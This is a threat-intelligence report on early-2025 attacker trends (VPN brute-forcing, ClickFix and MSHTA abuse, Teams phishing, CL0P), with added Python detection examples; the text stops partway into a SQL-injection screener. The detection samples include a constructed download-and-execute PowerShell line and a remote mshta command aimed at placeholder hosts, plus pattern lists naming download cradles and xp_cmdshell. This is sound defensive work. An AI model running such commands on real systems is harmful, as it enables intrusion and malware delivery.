Key Findings
Between December 2024 and February 2025 (“the reporting period”), ReliaQuest analyzed customer incidents, detection trends, and threat actor behavior to reveal key attacker techniques and emerging malware trends. In this report, we frame these findings within the broader threat landscape, providing real-world case studies, actionable recommendations to defend against similar attacks, and predictions for what lies ahead.
The attacks analyzed in this report are typically carried out by financially motivated actors. Our insights are relevant across industries, highlighting how these attackers deliberately probe for defense weaknesses and prey on organizations struggling to keep up with the ever-increasing pace of cyber attacks. Keep reading for an in-depth analysis to help your organization stay ahead of evolving threats and strengthen its defenses against emerging challenges.
Top Tactics Targeting Enterprise Environments
In this section, we take a closer look at a selection of MITRE tactics to identify the latest attacker trends and the reasons behind their popularity.
Initial Access via VPN Brute-Forcing Up 21.3%
Figure 1: Top MITRE ATT&CK initial access techniques in true-positive incidents (% of total) during reporting period
During the reporting period, initial access attempts targeting external remote services like VPNs[1], RDP, and virtual desktop infrastructure (VDI) surged by 21.3% compared to the same time last year (December 2023–February 2024).
Most of these attempts involved brute-forcing, likely linked to a large-scale brute-force attack observed in late January 2025 against internet-facing remote-access devices like VPNs. While the exact goal of this attack remains unknown, it was almost certainly aimed at identifying devices with weak or valid leaked credentials to facilitate initial access. Although outside the reporting period, leaked chat logs in March 2025 revealed an automated brute-forcing tool used by the ransomware group “Black Basta”[2], underscoring how valuable this method is for attackers seeking initial access.
As highlighted in our 2025 Annual Cyber-Threat Report, insecure external remote services are the most effective entry point for attackers. By simply authenticating to networks, they can evade detection and seamlessly blend in with legitimate users—making this method highly appealing for adversaries.
Administrator Account Brute-Forced via RDP: In January 2025, GreyMatter flagged a suspicious file, System Informer, installed on a customer’s system. This open-source tool, commonly used for monitoring system resources, can also expose host information to attackers. Our investigation uncovered malicious discovery commands executed using PsExec and Netscan.exe. Using GreyMatter Respond, we immediately isolated the compromised host. Further analysis revealed that the system had been exposed to the internet via RDP, and the Windows Administrator account had been brute-forced. Thanks to swift detection and response, the host was contained before the attacker could initiate lateral movement.
MSHTA Abuse for Defense Evasion Jumps 7.8%
Figure 2: Top MITRE ATT&CK defense evasion techniques in true-positive incidents (% of total) during reporting period
Proxy execution with MSHTA, a native Windows binary for running HTML application files, increased 7.8%, climbing from 16th to second place compared to the same time last year.
This rise in MSHTA abuse is almost certainly driven by the increase in deceptive CAPTCHAs delivered using the JavaScript framework “ClearFake.” These fake CAPTCHAs trick victims into executing malicious MSHTA commands in Windows run prompts, bypassing traditional security controls designed to detect file-based delivery methods like phishing.
By convincing users to copy and paste MSHTA commands, attackers can execute malicious files remotely and outside the user’s browser, evading browser-based protections like Google Safe Browsing.
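The following is an added example, not code from the report or from ReliaQuest, showing how a defender can triage process-creation telemetry for the MSHTA proxy execution described above. Events are simplified dictionaries (parent image, image, command line) standing in for the fields that Windows Event ID 4688 with command-line logging or Sysmon Event ID 1 would provide; the sample events and the `example.invalid` URL are constructed. The logic separates a locally installed .hta application from the ClickFix pattern, where MSHTA is handed a remote URL or an inline script protocol handler, typically by a user pasting into the Run prompt or a shell.

```python
"""Added example (not from the report): triage process-creation events for
MSHTA proxy execution. Events are simplified dicts; in practice the fields
come from Windows Event ID 4688 (with command-line logging) or Sysmon Event ID 1."""
import re

# Remote content or an inline script protocol handler is what separates
# ClickFix-style abuse from a locally installed .hta application.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_PROTO_RE = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
# Parents that indicate a user typed or pasted the command (Run prompt,
# a shell) rather than an application launching its own help file.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Return the file name of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: dict) -> dict:
    """Return {'suspicious': bool, 'reasons': [...]} for one process event."""
    if basename(event["image"]) != "mshta.exe":
        return {"suspicious": False, "reasons": []}
    cmd = event["cmdline"]
    parent = basename(event["parent"])
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote_url")
    if SCRIPT_PROTO_RE.search(cmd):
        reasons.append("inline_script_protocol")
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"interactive_parent:{parent}")
    # A local .hta launched by an application is treated as benign here;
    # remote content or an inline script is enough to raise the event.
    suspicious = "remote_url" in reasons or "inline_script_protocol" in reasons
    return {"suspicious": suspicious, "reasons": reasons}


def scan_events(events: list) -> list:
    """Return (index, reasons) for every suspicious event."""
    hits = []
    for i, ev in enumerate(events):
        verdict = classify_event(ev)
        if verdict["suspicious"]:
            hits.append((i, verdict["reasons"]))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/verify"},
    {"parent": r"C:\Program Files\Vendor\App.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe https-notes.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": "mshta.exe javascript:close()"},
]

if __name__ == "__main__":
    for idx, reasons in scan_events(SAMPLE_EVENTS):
        print(idx, reasons)
```

The interactive-parent reason is recorded as context rather than as a trigger on its own, because a user double-clicking a legitimate .hta file also produces an explorer.exe parent; it is the remote URL or inline script that makes the event worth an analyst's time.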
Lateral Movement: Internal Phishing Continues to Dominate
Figure 3: Top MITRE ATT&CK lateral movement techniques in true-positive incidents (% of total) during reporting period
Internal spearphishing remains the most common technique for lateral movement and is often paired with inbox rule hiding to conceal incoming emails in a compromised user’s inbox.
This method is highly effective because it takes advantage of the credibility of known senders. According to our 2025 Annual Threat Report, nine out of ten phishing emails involved in successful account compromises originated from trusted partner organizations.
By gaining access to internal accounts, attackers can send phishing emails to other employees while hiding replies from the account owner. This allows them to respond freely and advance their attack. The risk posed by internal phishing depends on the adversary’s goals but often leads to financial fraud, additional account compromises, or malware infections.
First Sightings of the Sneaky 2FA Phishing Kit: Phishing kits like “Sneaky 2FA” simplify compromising business email accounts, fueling internal phishing campaigns. First observed in January 2025, Sneaky 2FA operates as a phishing-as-a-service (PhaaS) and offers advanced features like adversary-in-the-middle (AiTM) functionality to bypass multifactor authentication (MFA), anti-analysis tools to redirect non-targeted traffic to Wikipedia, and convincing replicas of Microsoft authentication portals.
Early in 2025, GreyMatter detected the creation of a suspicious email inbox rule for a manufacturing sector customer. Our investigation revealed that a threat actor had gained access to the organization, tracing the initial compromise back to an initial phishing attack that involved a Sneaky 2FA domain impersonating a Microsoft login portal. Using GreyMatter Respond, we revoked sessions for the impacted account and promptly reset credentials.
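As an added example (not ReliaQuest's detection logic), the following scores inbox-rule changes for the hiding behaviour described above. Records follow the general shape of Microsoft 365 Unified Audit Log entries for the Exchange cmdlets `New-InboxRule` and `Set-InboxRule` (a `UserId`, an `Operation`, and `Parameters` as Name/Value pairs); the records themselves, the user names and the `contoso.example` domain are constructed.

```python
"""Added example (not ReliaQuest's rule): flag inbox rules that hide mail.
Records follow the shape of Microsoft 365 Unified Audit Log entries
(UserId, Operation, Parameters as Name/Value pairs); the data is constructed."""
import re

# Folders attackers commonly use to park mail where the owner rarely looks.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "deleted items",
                  "junk email", "archive", "conversation history"}
# Terms that suggest the rule filters for security notices or finance
# threads rather than routine housekeeping.
KEYWORD_RE = re.compile(
    r"invoice|payment|wire|password|mfa|security|suspicious|phish|hack", re.I)
RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule"}


def rule_parameters(record: dict) -> dict:
    """Flatten the Parameters list into a {name: value} dict of strings."""
    return {p["Name"]: str(p["Value"]) for p in record.get("Parameters", [])}


def score_rule(record: dict):
    """Return a list of reasons, or None if the record is not a rule change."""
    if record.get("Operation") not in RULE_OPERATIONS:
        return None
    params = rule_parameters(record)
    reasons = []
    if params.get("DeleteMessage", "").lower() == "true":
        reasons.append("deletes_messages")
    if params.get("MarkAsRead", "").lower() == "true":
        reasons.append("marks_as_read")
    if params.get("MoveToFolder", "").lower() in HIDING_FOLDERS:
        reasons.append("moves_to_hidden_folder")
    for key in ("SubjectContainsWords", "BodyContainsWords",
                "FromAddressContainsWords"):
        if KEYWORD_RE.search(params.get(key, "")):
            reasons.append(f"keyword_filter:{key}")
    # Rules named "." or ".." are a recurring trait of attacker-created rules.
    if len(params.get("Name", "").strip(" .,_-")) <= 1:
        reasons.append("blank_or_punctuation_name")
    return reasons


def find_hiding_rules(records: list, min_reasons: int = 2) -> list:
    """Return alerts for rule changes showing at least min_reasons indicators."""
    alerts = []
    for rec in records:
        reasons = score_rule(rec)
        if reasons and len(reasons) >= min_reasons:
            alerts.append({"user": rec["UserId"],
                           "operation": rec["Operation"],
                           "reasons": reasons})
    return alerts


# Constructed sample audit records (not real data).
SAMPLE_RECORDS = [
    {"UserId": "sales01@contoso.example", "Operation": "New-InboxRule",
     "Parameters": [{"Name": "Name", "Value": ".."},
                    {"Name": "SubjectContainsWords", "Value": "invoice;payment"},
                    {"Name": "MoveToFolder", "Value": "RSS Subscriptions"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"UserId": "hr@contoso.example", "Operation": "New-InboxRule",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                    {"Name": "FromAddressContainsWords", "Value": "newsletter@vendor.example"},
                    {"Name": "MoveToFolder", "Value": "Newsletters"}]},
    {"UserId": "ops@contoso.example", "Operation": "Set-InboxRule",
     "Parameters": [{"Name": "Name", "Value": "Cleanup"},
                    {"Name": "DeleteMessage", "Value": "True"},
                    {"Name": "SubjectContainsWords", "Value": "out of office"}]},
    {"UserId": "sales01@contoso.example", "Operation": "UserLoggedIn",
     "Parameters": []},
]

if __name__ == "__main__":
    for alert in find_hiding_rules(SAMPLE_RECORDS):
        print(alert)
```

A single indicator (the `Cleanup` rule that deletes out-of-office replies) stays below the threshold, while the rule that both parks finance-related mail in RSS Subscriptions and marks it read is raised; the threshold is the knob to tune against the rules your own users legitimately create.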
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Enable these detection rules to prevent the top initial access, defense evasion, and lateral movement techniques mentioned in this report:
Detection Rule | MITRE ATT&CK ID | Summary |
---|---|---|
Successful Remote Brute Force | TA0003: T1133 – External Remote Services | This rule detects successful logins that occur shortly after multiple failed authentication attempts against a VPN or public-facing host, potentially indicating unauthorized access through password guessing. |
Suspicious MSHTA Command Execution | TA0002: T1059.003 – Windows Command Shell TA0005: T1218.005 – Mshta | This rule monitors the execution of suspicious MSHTA.exe commands seen in past compromises, like phishing attacks where users unknowingly ran HTML application files hidden within encrypted .zip files. |
Phishing Link Clicked Followed by MFA | TA0043: T1598.002 – Spearphishing Attachment TA0008: T1534 – Internal Spearphishing TA0043: T1598.003 – Spearphishing Link TA0001: T1566.002 – Spearphishing Link | This rule detects phishing attacks where users are tricked into entering credentials on fake sites and approving MFA requests. It flags malicious URLs clicked in emails, followed by successful MFA authentication. |
Your Action Plan
- Secure Entry Points: Pair MFA with Conditional Access policies and device certificates for VPN authentication. Audit exposed RDP sessions, remove unintended public-facing instances, and use a jump box as a secure gateway instead of exposing individual systems.
- Identify Defense Evasion: Enable mailbox auditing in Microsoft 365 to detect suspicious inbox rule changes—a telltale sign of account compromise. Monitor MSHTA.exe activity by enabling Audit Process Creation and command-line logging (Event ID 4688), as attackers often use MSHTA.exe to execute payloads.
- Prevent AiTM Phishing: Implement Fast IDentity Online (FIDO) to secure high-risk accounts, as it’s resistant to AiTM attacks. Educate employees to spot phishing attempts from trusted sources like partners or internal accounts—not just external ones.
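The "Successful Remote Brute Force" rule above correlates a burst of authentication failures with a subsequent success. The following is an added example of that correlation, written for this page and not ReliaQuest's rule implementation; it runs over constructed VPN authentication log lines in a simple `key=value` format (the `203.0.113.0/24` and `198.51.100.0/24` addresses are documentation ranges), keying the failure count on the source address so that attempts spread across several user names are still counted together.

```python
"""Added example (not ReliaQuest's rule logic): correlate repeated VPN
authentication failures followed by a success from the same source IP."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample VPN authentication log lines (not real data).
SAMPLE_LOGS = [
    "2025-01-28T02:14:01Z src=203.0.113.10 user=jsmith result=FAILURE",
    "2025-01-28T02:14:03Z src=203.0.113.10 user=jsmith result=FAILURE",
    "2025-01-28T02:14:05Z src=203.0.113.10 user=admin result=FAILURE",
    "2025-01-28T02:14:07Z src=203.0.113.10 user=admin result=FAILURE",
    "2025-01-28T02:14:09Z src=203.0.113.10 user=admin result=FAILURE",
    "2025-01-28T02:14:11Z src=198.51.100.7 user=mlee result=FAILURE",
    "2025-01-28T02:14:12Z src=203.0.113.10 user=admin result=FAILURE",
    "2025-01-28T02:14:20Z src=198.51.100.7 user=mlee result=SUCCESS",
    "2025-01-28T02:15:02Z src=203.0.113.10 user=admin result=SUCCESS",
]


def parse_line(line: str):
    """Split an ISO timestamp from the key=value fields that follow it."""
    ts, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), fields


def find_successful_brute_force(lines, threshold: int = 5,
                                window: timedelta = timedelta(minutes=10)):
    """Alert when a source logs in after >= threshold failures within window.

    Failures are keyed on the source address rather than the user name, so a
    single host cycling through accounts (password spraying) is still caught.
    """
    failures = defaultdict(deque)  # src -> timestamps of recent failures
    alerts = []
    for line in lines:  # lines are assumed to be in chronological order
        ts, f = parse_line(line)
        recent = failures[f["src"]]
        while recent and ts - recent[0] > window:
            recent.popleft()  # drop failures outside the sliding window
        if f["result"] == "FAILURE":
            recent.append(ts)
        elif f["result"] == "SUCCESS" and len(recent) >= threshold:
            alerts.append({"src": f["src"], "user": f["user"],
                           "failures": len(recent),
                           "success_at": ts.isoformat()})
            recent.clear()  # one alert per burst
    return alerts


if __name__ == "__main__":
    for alert in find_successful_brute_force(SAMPLE_LOGS):
        print(alert)
```

The second source (`198.51.100.7`) fails once before logging in, which is ordinary user behaviour and is not raised; the first source accumulates six failures across two accounts and then succeeds as `admin`, which is the pattern the rule is meant to surface. On real VPN logs the threshold and window are the values to tune, and the success event is the one to follow up, because it is the session an attacker would use to blend in.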
ReliaQuest Investigates: Rise and Fall of Storm-1811 Attacks
In October 2024, the Russia-linked Black Basta ransomware group unveiled a new technique weaponizing Microsoft Teams for phishing, exploiting the trust users place in corporate chat platforms. In December 2024, “Storm-1811,” also known as “STAC5777,” (see table below) escalated Microsoft Teams phishing attacks, causing a significant spike in activity. However, by late February 2025, attack activity had noticeably declined, likely because of internal turmoil within Black Basta, which led to chats being leaked around the same time[3] (see Figure 4).
Figure 4: Microsoft Teams phishing attacks, December 2024–February 2025
Storm-1811 Campaign Key Findings
Initial Access:
- In 83% of incidents, the sender display name was “Help Desk.”
- Employees in sales and accounting departments were the most frequently targeted.
- Targeted employees received Microsoft Teams messages predominantly between 12 p.m. and 3 p.m. on weekdays.
- In 58% of incidents, the sender domain was “onmicrosoft[.]com.”
C2:
- If the targeted employee engaged, the attacker would convince them to grant device access through the remote monitoring and management (RMM) tool Quick Assist, establishing command-and-control (C2).
Persistence:
- If C2 was established, the attacker executed the malicious Dynamic Link Library (DLL) file “winhttp.dll,” which was sideloaded with the legitimate Microsoft executable OneDriveStandaloneUpdater.exe. This setup ensured persistence through system reboots via the startup folder.
If Black Basta’s internal conflicts remain unresolved, affiliates like Storm-1811 are likely to leave and take their techniques to other ransomware-as-a-service (RaaS) providers. This shift could lead to overlapping tactics, techniques, and procedures (TTPs) across other threat clusters, complicating attribution and potentially altering the nature of attacks.
Defenders should prepare for this development, as Black Basta affiliates may apply their techniques within other groups, making adversary behavior harder to predict and complicating efforts to anticipate objectives.
The table below shows the attribution of Microsoft Teams phishing and vishing attacks.
Analysis of Competing Hypothesis Attribution Matrix
Evidence | Storm-1811 | “FIN7” | “CURLY SPIDER” | STAC5777 | “STAC5143” |
---|---|---|---|---|---|
Microsoft Teams Phishing | ++ | — | – | ++ | ++ |
Voice Phishing | ++ | ++ | ++ | ++ | ++ |
Quick Assist RMM for C2 | ++ | — | ++ | ++ | — |
DLL Side-Loading with “winhttp.dll” | ++ | — | — | ++ | — |
Microsoft Tenant Help-Desk Impersonation | ++ | — | — | ++ | ++ |
Collaborates with Black Basta RaaS | ++ | + | ++ | ++ | ++ |
Key
- ++: Evidence strongly supports the hypothesis and is highly consistent with the threat cluster’s known behavior.
- +: Evidence somewhat supports the hypothesis but is not definitive or conclusive.
- –: Evidence weakly contradicts the hypothesis but does not strongly disprove it.
- —: Evidence strongly contradicts the hypothesis and is highly inconsistent with the threat cluster’s known behavior.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Below is an example detection rule we recommend implementing to effectively identify Microsoft Teams phishing attacks.
Detection Rule | MITRE ATT&CK ID | Summary |
---|---|---|
Potential Microsoft Teams Phishing | TA0001: T1566 – Phishing TA0043: T1598 – Phishing for Information | This rule detects inbound Microsoft Teams messages from external tenants that share properties with true-positive phishing incidents. External attackers can use tools like TeamsPhisher to deliver malicious messages, including links to file-sharing sites and/or credential harvesting sites. Incoming messages from untrusted external domains should be reviewed for authenticity. |
Your Action Plan
- Limit External Channels: Disable external chat in Microsoft Teams through the admin center to prevent phishing attacks from external attackers. If external communication is required, implement an allowlist to restrict interactions to trusted domains.
- Prioritize Established Procedures: Train employees to strictly follow established procedures and communication channels when engaging with IT. Threat actors often impersonate IT personnel via direct calls to manipulate employees.
- Monitor Microsoft Teams Chats: Enable logging for Microsoft Teams “ChatCreated” operations[4] to enhance detection capabilities and provide critical context for efficient investigations.
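Putting the Storm-1811 traits listed above (a “Help Desk” display name, an onmicrosoft.com sender domain, weekday early-afternoon timing, an external tenant) into a scoring function, as an added example that is not ReliaQuest's rule: the record layout used here (`Operation`, `CreationTime`, and a `Sender` with `DisplayName` and `UPN`) is a simplifying assumption standing in for the Teams “ChatCreated” audit records, and the sample records, the `contoso.example` tenant and the `placeholder-tenant.onmicrosoft.com` domain are constructed.

```python
"""Added example (not from the report): score Teams ChatCreated audit records
against the Storm-1811 campaign traits. The record layout (Sender with
DisplayName/UPN, CreationTime in local time) is an assumption; real audit
records carry the same information in a richer structure."""
import re
from datetime import datetime

HELPDESK_RE = re.compile(r"help\s*desk|service\s*desk|it\s*support", re.I)
# Constructed: domains belonging to our own tenant (internal chats are skipped).
OWN_DOMAINS = {"contoso.example"}


def sender_domain(upn: str) -> str:
    """Return the lower-cased domain part of a user principal name."""
    return upn.rsplit("@", 1)[-1].lower()


def score_chat(record: dict) -> list:
    """Return the campaign traits a ChatCreated record exhibits."""
    if record.get("Operation") != "ChatCreated":
        return []
    sender = record["Sender"]
    domain = sender_domain(sender["UPN"])
    if domain in OWN_DOMAINS:
        return []  # internal chat; out of scope for this rule
    reasons = ["external_tenant"]
    if domain.endswith(".onmicrosoft.com"):
        reasons.append("onmicrosoft_default_domain")
    if HELPDESK_RE.search(sender.get("DisplayName", "")):
        reasons.append("helpdesk_impersonation")
    # CreationTime is assumed already converted to the recipient's local time.
    ts = datetime.fromisoformat(record["CreationTime"])
    if ts.weekday() < 5 and 12 <= ts.hour < 15:
        reasons.append("campaign_time_window")
    return reasons


def flag_chats(records: list, min_score: int = 3) -> list:
    """Return (index, reasons) for records with at least min_score traits."""
    flagged = []
    for i, rec in enumerate(records):
        reasons = score_chat(rec)
        if len(reasons) >= min_score:
            flagged.append((i, reasons))
    return flagged


# Constructed sample records (not real data). 2025-01-14 is a Tuesday,
# 2025-01-18 a Saturday.
SAMPLE_CHATS = [
    {"Operation": "ChatCreated", "CreationTime": "2025-01-14T13:22:00",
     "Sender": {"DisplayName": "Help Desk",
                "UPN": "admin_01@placeholder-tenant.onmicrosoft.com"}},
    {"Operation": "ChatCreated", "CreationTime": "2025-01-15T09:05:00",
     "Sender": {"DisplayName": "Alice Partner", "UPN": "alice@partner.example"}},
    {"Operation": "ChatCreated", "CreationTime": "2025-01-16T14:10:00",
     "Sender": {"DisplayName": "Help Desk", "UPN": "helpdesk@contoso.example"}},
    {"Operation": "ChatCreated", "CreationTime": "2025-01-18T13:00:00",
     "Sender": {"DisplayName": "IT Support",
                "UPN": "svc@placeholder-tenant.onmicrosoft.com"}},
]

if __name__ == "__main__":
    for idx, reasons in flag_chats(SAMPLE_CHATS):
        print(idx, reasons)
```

The genuine partner chat scores only one trait and is left alone; the weekend "IT Support" message still reaches the threshold on the other three, which is the point of scoring rather than requiring every trait at once. If external chat is disabled or allowlisted as the first action item recommends, the rule reduces to watching the allowlisted domains for help-desk impersonation.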
Top Malware You Should Know
Figure 5: Top three malware in true-positive incidents (% of total) during reporting period
ClearFake malware jumped 17% during the reporting period, rising from 13th to 1st place compared to September–November 2024.
This surge in ClearFake activity is almost certainly driven by its adoption of the “ClickFix” technique. This method tricks users into copying malicious commands into PowerShell or the Windows Run prompt (see Figure 5), bypassing browser and antivirus protections for higher success rates. The rise in MSHTA proxy execution coincides with this technique, as it uses the Windows Run prompt to execute malicious commands.
We’ve observed ClearFake delivering “Lumma,” an info-stealing malware, which is now sold as malware-as-a-service (MaaS) on dark-web forums like XSS. For example, a December 2024 post advertised the malware’s ability to impersonate CAPTCHAs and its copy-and-paste execution feature to bypass browser-based detections like Windows Defender SmartScreen and file download reputation checks. Now that malware featuring the copy-paste technique can be purchased, its accessibility to attackers has increased. Alternative variants using this technique are likely to follow to compete in the cybercriminal market.
Figure 6: Fake CAPTCHA Run Command
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Below is an example detection rule we recommend implementing to effectively identify malware activity.
Detection Rule | MITRE ATT&CK ID | Summary |
---|---|---|
Suspicious Encoded PowerShell Execution | TA0002: T1059.001 – PowerShell TA0011: T1132.001 – Standard Encoding TA0005: T1027.010 – Command Obfuscation TA0005: T1140 – Deobfuscate/Decode Files or Information | Threat actors and malware often leverage PowerShell for execution, often using encoded commands to obfuscate their payloads. This alert identifies potentially compromised hosts by detecting PowerShell command-line arguments that, when paired with encoded commands, may indicate suspicious activity. |
Your Action Plan
- Disable the Run Prompt: Implement a Group Policy to disable the Windows Run command prompt for departments that don’t require it. This prevents users from executing instructions provided by fake CAPTCHAs.
- Log PowerShell Events: Use Group Policy to enable PowerShell logging, including script block logging and transcription. This ensures visibility for detecting malicious PowerShell commands originating from copy-paste malware.
- Disable Clipboard Pasting: Disable pasting in Windows Command Prompt and PowerShell, commonly used by ClickFix, by setting the QuickEdit value under the registry key HKEY_CURRENT_USER\Console to zero via Group Policy. Test this change first and apply it only to departments where disabling QuickEdit mode won’t disrupt operations.
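The "Suspicious Encoded PowerShell Execution" rule above looks at PowerShell command lines carrying an encoded command. The following added example (written for this page, not ReliaQuest's rule) shows the decoding step a detection or triage pipeline needs: PowerShell's `-EncodedCommand` argument (which the interpreter also accepts as any unambiguous prefix such as `-enc` or `-e`) is base64 over UTF-16LE text, so the payload must be decoded that way before any content matching is possible. The sample command lines are constructed in the script itself, including the `example.invalid` URL, so nothing here is taken from a real incident.

```python
"""Added example (not ReliaQuest's rule): decode PowerShell -EncodedCommand
arguments from process command lines and flag common indicators."""
import base64
import re

# Indicators matched against the decoded script plus the outer command line.
SUSPICIOUS_PATTERNS = [
    ("download_cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|WebClient", re.I)),
    ("invoke_expression", re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("nested_base64", re.compile(r"FromBase64String", re.I)),
]


def extract_encoded_command(cmdline: str):
    """Return the base64 argument following -EncodedCommand (or any prefix of it)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith(("-", "/")):
            name = tok[1:].lower()
            # PowerShell accepts any unambiguous prefix of a parameter name;
            # "-e", "-ec", "-enc" all mean -EncodedCommand ("-ep" does not).
            if name and name[0] == "e" and "encodedcommand".startswith(name):
                return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(b64: str):
    """Decode base64 UTF-16LE text; return None if it is not well-formed."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell_cmdline(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and list indicators found."""
    result = {"encoded": False, "decoded": None, "indicators": []}
    lowered = cmdline.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return result
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return result
    result["encoded"] = True
    result["decoded"] = decode_encoded_command(b64)
    haystack = (result["decoded"] or "") + " " + cmdline
    for name, pattern in SUSPICIOUS_PATTERNS:
        if pattern.search(haystack):
            result["indicators"].append(name)
    return result


def _encode(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not from a real incident).
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + _encode(
        "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"),
    "powershell.exe -NoProfile -EncodedCommand " + _encode("Get-Date"),
    r"powershell.exe -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(analyze_powershell_cmdline(cmd))
```

The second sample shows why decoding comes before alerting: an encoded `Get-Date` is how plenty of management tooling invokes PowerShell, and it produces no indicators. Script block logging, as the action item above recommends, records the decoded script on the host itself, which removes the need to reverse the encoding from command-line telemetry alone.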
CL0P Ransomware Rises to Top Spot
Figure 7: Number of organizations listed on ransomware data-leak sites, by site, during reporting period
Financially motivated threat actors use data-leak sites to pressure organizations through extortion, with the “CL0P” ransomware group identified as the most active during the reporting period. Compared to the three months prior (September–November 2024), “RansomHub” remains the most consistent group, likely because of its attractive profit split, which was revised in January 2025.
The spike in CL0P’s listings is almost certainly linked to its exploitation of Cleo software (CVE-2024-50623)[5] in December 2024. Adversaries like CL0P are drawn to exploits that impact widely used, internet-facing software, as a single exploit can yield high returns across multiple organizations. This tactic may also increase profits for CL0P members by eliminating the need to share revenue between affiliates and ransomware developers.
This highlights the critical risk of failing to implement mitigations, apply patches, or remove vulnerable devices from the internet when critical vulnerabilities are actively exploited. Organizations should assess their internet-facing exposure and reduce their attack surface by removing or securing exposed devices wherever possible.
Figure 8: Organizations listed on ransomware data-leak sites, by sector, Sep 1–Nov 30, 2024 vs. Dec 1, 2024–Feb 28, 2025
A review of the top industries named on ransomware leak sites reveals no changes in the top two spots compared to the previous three months. However, the retail trade sector experienced a staggering 153% increase in listings, climbing from fifth to third place (see Figure 7).
This surge is almost certainly heavily influenced by CL0P’s exploitation of Cleo Harmony, software that enables enterprise retail organizations to streamline and automate data integration and secure file transfers. Cleo Harmony facilitates critical processes such as exchanging invoices, purchase orders, and shipping notifications with suppliers and logistics providers. Unfortunately, the widespread adoption of vulnerable software makes it an attractive target for adversaries, emphasizing the need for stringent supply-chain and vendor-risk management programs.
Whether CL0P is conducting exploit development research internally or collaborating with exploit brokers, it’s likely the group will launch another mass exploitation attack within the next year, following its momentum of exploiting managed file transfer (MFT) applications, including Accellion, GoAnywhere, MOVEit, and Cleo. Organizations should remain vigilant about the risks posed by mass-market, vendor-provided software that’s publicly accessible, as it continues to be an attractive target for adversaries.
Step Up Your Defenses
How ReliaQuest Helps You Stay Ahead
Effectively identify CL0P ransomware activity with this detection rule:
Detection Rule | MITRE ATT&CK ID | Summary |
---|---|---|
SQL Command Injection | TA0001: T1190 – Exploit Public-Facing Application TA0003: T1505.001 – SQL Stored Procedures | An attacker leveraging SQL injection can run commands against the database’s operating system to establish persistence. This alert detects database queries containing suspicious SQL or operating system commands that may indicate a command injection attempt. |
Your Action Plan
- Deploy an NGFW: Place next-generation firewalls (NGFWs) in front of critical public-facing assets, such as managed file transfer servers, to enable deep packet inspection and the detection of malicious payloads, such as SQL injection, stopping attack attempts in their tracks.
- Prioritize Patching External-Facing Assets: Focus on assets that house sensitive data or could lead to initial access. Develop fallback plans in case assets need to be removed from public access.
- Create a C-SCRM Program: Implement Cybersecurity Supply Chain Risk Management (C-SCRM) programs that include supplier risk assessments, vendor contractual agreements, and failover processes for business-critical software under active exploitation. This approach mitigates risks from insecure development practices and ensures business continuity during exploitation attempts.
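The "SQL Command Injection" rule above describes screening logged queries for operating-system commands issued through the database. As an added example that is not ReliaQuest's rule, the following normalises query text (stripping comments, which are a common way to split a procedure name so that a naive keyword match misses it) and scores it for the stored procedures that reach the operating system from T-SQL, for `OPENROWSET(BULK ...)` file reads, and for stacked statements. The query strings are constructed; in a deployment they would come from SQL Server Audit or Extended Events.

```python
"""Added example (not ReliaQuest's rule): screen logged database queries for
operating-system command execution via SQL injection. Query text is
constructed; in practice it comes from SQL Server Audit or Extended Events."""
import re

COMMENT_RE = re.compile(r"/\*.*?\*/|--[^\n]*", re.S)
# Stored procedures that reach the operating system or COM from T-SQL.
OS_EXEC_PROCS = ("xp_cmdshell", "sp_oacreate", "sp_oamethod",
                 "xp_regwrite", "sp_execute_external_script")
STACKED_RE = re.compile(r";\s*(?:exec|execute|declare|xp_|sp_)")
OPENROWSET_BULK_RE = re.compile(r"openrowset\s*\(\s*bulk")
CONFIG_RE = re.compile(r"\bsp_configure\b")


def normalize_sql(query: str) -> str:
    """Remove comments (used to split names, e.g. xp_/**/cmdshell),
    collapse whitespace and lower-case the text before matching."""
    stripped = COMMENT_RE.sub("", query)
    return re.sub(r"\s+", " ", stripped).strip().lower()

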